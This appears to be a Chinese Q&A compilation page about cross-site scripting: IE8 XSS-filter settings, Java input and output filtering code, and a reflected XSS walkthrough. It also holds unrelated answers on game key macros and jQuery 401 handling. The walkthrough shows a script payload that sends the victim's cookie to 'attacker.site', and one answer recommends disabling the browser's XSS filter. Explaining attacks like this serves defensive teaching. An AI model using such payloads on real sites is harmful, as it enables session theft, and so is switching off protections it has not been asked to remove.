A. 如何取消阻止跨站脚本
取消阻止跨站脚本,请按以下步骤操作:
1、点击 IE8 的“工具”-“Internet 选项”。
(1)脚本防拦截扩展阅读
IE浏览器的安全构架:
Internet Explorer使用一个基于区域的安全架构,意思是说网站按特写的条件组织在一起。它允许对大量的功能进行限制,也允许只对指定功能进行限制。
对浏览器的补丁和更新通过Windows更新服务以及自动更新定期发布以供使用。
最新版的Internet Explorer提供了一个下载监视器和安装监视器,允许用户分两步选择是否下载和安装可执行程序。这可以防止恶意软件被安装。
用Internet Explorer下载的可执行文件被操作系统标为潜在的不安全因素,每次都会要求用户确认他们是否想执行该程序,直到用户确认该文件为“安全”为止。
参考资料来源:网络-Internet Explorer
B. IE浏览器阻止跨站脚本什么原因,怎么解决
登陆protal后,点击查看报表,这是protal会发送转到cognos的请求,如果使用的IE8,则这个请求会被拦截,提示“Internet Explorer 已对此页面进行了修改,以帮助阻止跨站脚本。单击此处,获取详细信息...”。这个错误是由于 IE8 的跨站脚本(Cross-site scripting, XSS)防护阻止了跨站发送的请求。点击 IE8 的“工具”-“Internet 选项”,进入“安全”选项卡,打开“Internet”下方的“自定义级别”,在“安全设置”对话框中找到“启用 XSS 筛选器”,改为“禁用”即可
C. 如何防止跨站点脚本攻击
防止跨站点脚本攻击的解决方法:
1.输入过滤
对每一个用户的输入或者请求首部,都要进行过滤。这需要程序员有良好的安全素养,而且需要覆盖到所有的输入源。而且还不能够阻止其他的一些问题,如错误页等。
final String filterPattern="[<>{}\\[\\];\\&]";
String inputStr = s.replaceAll(filterPattern," ");
2.输出过滤
public static String encode(String data)
{
final StringBuffer buf = new StringBuffer();
final char[] chars = data.toCharArray();
for (int i = 0; i < chars.length; i++)
{
buf.append("&#" + (int) chars[i]);
}
return buf.toString();
}
public static String decodeHex(final String data,
final String charEncoding)
{
if (data == null)
{
return null;
}
byte[] inBytes = null;
try
{
inBytes = data.getBytes(charEncoding);
}
catch (UnsupportedEncodingException e)
{
//use default charset
inBytes = data.getBytes();
}
byte[] outBytes = new byte[inBytes.length];
int b1;
int b2;
int j=0;
for (int i = 0; i < inBytes.length; i++)
{
if (inBytes[i] == '%')
{
b1 = Character.digit((char) inBytes[++i], 16);
b2 = Character.digit((char) inBytes[++i], 16);
outBytes[j++] = (byte) (((b1 & 0xf) << 4) +
(b2 & 0xf));
}
else
{
outBytes[j++] = inBytes[i];
}
}
String encodedStr = null;
try
{
encodedStr = new String(outBytes, 0, j, charEncoding);
}
catch (UnsupportedEncodingException e)
{
encodedStr = new String(outBytes, 0, j);
}
return encodedStr;
}
<!-- Maps the 404 Not Found response code
to the error page /errPage404 -->
<error-page>
<error-code>404</error-code>
<location>/errPage404</location>
</error-page>
<!-- Maps any thrown ServletExceptions
to the error page /errPageServ -->
<error-page>
<exception-type>javax.servlet.ServletException</exception-type>
<location>/errPageServ</location>
</error-page>
<!-- Maps any other thrown exceptions
to a generic error page /errPageGeneric -->
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/errPageGeneric</location>
</error-page>
任何的非servlet例外都被/errPageGeneric路径捕捉,这样就可以处理。
Throwable throwable = (Throwable)
request.getAttribute("javax.servlet.error.exception");
String status_code = ((Integer)
request.getAttribute("javax.servlet.error.status_code")).toString( );
3.安装三方的应用防火墙,可以拦截css攻击。
附:
跨站脚本不像其他攻击只包含两个部分:攻击者和web站点。
跨站脚本包含三个部分:攻击者,客户和web站点。
跨站脚本攻击的目的是窃取客户的cookies,或者其他可以证明用户身份的敏感信息。
攻击
一个get请求
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host:
www.vulnerable.site
会产生如下的结果
<HTML>
<Title>Welcome!</Title>
Hi Joe Hacker
<BR>
Welcome to our system
...
</HTML>
但是如果请求被篡改
GET /welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0
Host: www.vulnerable.site
就会得到如下的响应
<HTML>
<Title>Welcome!</Title>
Hi <script>alert(document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>
这样在客户端会有一段非法的脚本执行,这不具有破坏作用,但是如下的脚本就很危险了。
http://www.vulnerable.site/welcome.cgi?name=<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.cookie)</script>
响应如下:
<HTML>
<Title>Welcome!</Title>
Hi
<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”+document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>
浏览器回执行该脚本并将客户的cookie发到一个攻击者的网站,这样攻击者就得到了客户的cookie。
D. 如何防止按键精灵脚本被游戏检测到是模拟按键!
按键精灵有录制功能的,就是像录像机一样录制你的动作,回头它在一模一样的播放动作。录制也可以生成脚本,你可以照着这个方法自己学习,英语有点基础就能学会,很好学的。不过,按键精灵只能按时间做动作,没法知道战斗是不是已经结束了,所以你要求的功能应该实现不了。
E. 如何防止ajax请求的参数被拦截修改
jquery ajax是个很常用接口,而在请求时候,可能存在响应401的情况(身份认证过期或未登录),比较容易出现在混合应用上,如何进行身份认证,重发失败请求,还是值得注意的。
ajax请求有两种方式
1. 回调
最常写的方式,成功失败处理以回调方式传入。
$.ajax({ ajax参数... success : xxxxxx error: xxxxxx });
2. Deferred方式
Deferred模式我在《js异步编程》有说明, ajax调用本身返回就是一个Deferred对象,成功失败回调不以参数传入。
$.ajax({ ajax参数... }).then(function(res){ //成功处理片段 },function(err){ //失败处理片段 });
既然有这两种方式,那应对处理401的方式也是有两种。
401处理的两种方式
1. 回调
这种方式的处理比较简单,在失败回调里面判断401,如果是则进行身份认证,成功重发请求。
function getXXXX(type, url, data, success, error){ $.ajax({ ajax参数... success : xxxxxx error : function(xhr,textStatus,errorThrown){ if (xhr.status == 401) { 刷新身份认证方法(function(){ getXXXX(type, url, data, success, error); }); } else{ // 调用外部的error error && error(xhr,textStatus,errorThrown); } } }); }
2. Deferred方式
这种方式目前我找到的处理方式需要修改jquery源码。
//全局设置一个方法 $.ajaxSetup({ authError : function(callback){ 刷新身份认证方法( function(){ callback && callback(); }); } }); //jquery2.1.4版本源码,大概是8261行 // Success/Error if ( isSuccess ) { deferred.resolveWith( callbackContext, [ success, statusText, jqXHR ] ); } else { if(( jqXHR.status == 401 || jqXHR .status == 403) && callbackContext.authError){ callbackContext.authError(function (){ state = 0; jqXHR.setRequestHeader( "Authorization", XXXXXX); jqXHR.readyState = 1; try { state = 1; transport.send( requestHeaders, done ); } catch ( e ) { // Propagate exception as error if not done if ( state < 2 ) { done( -1, e ); // Simply rethrow otherwise } else { throw e; } } }); return; } else { deferred.rejectWith( callbackContext, [ jqXHR, statusText, error ] ); } }
这里说下为什么不能像第一种方式那样进行请求。
有两个原因:
1. then这种链式写法,导致这请求的回调不是在参数里,而是在jQuery.Callbacks一个optionsCache全局变量里,我们无法在ajax error里拿到回调函数进行重发。
2. 写在then里的回调触发一次就会被销毁,当触发了error时,回调执行后就销毁。
最后的处理方式就是在要触发error之前,拦截401的错误,重新进行身份认证,然后重置状态,重发请求。
以上这篇当jquery ajax遇上401请求的解决方法就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持脚本之家。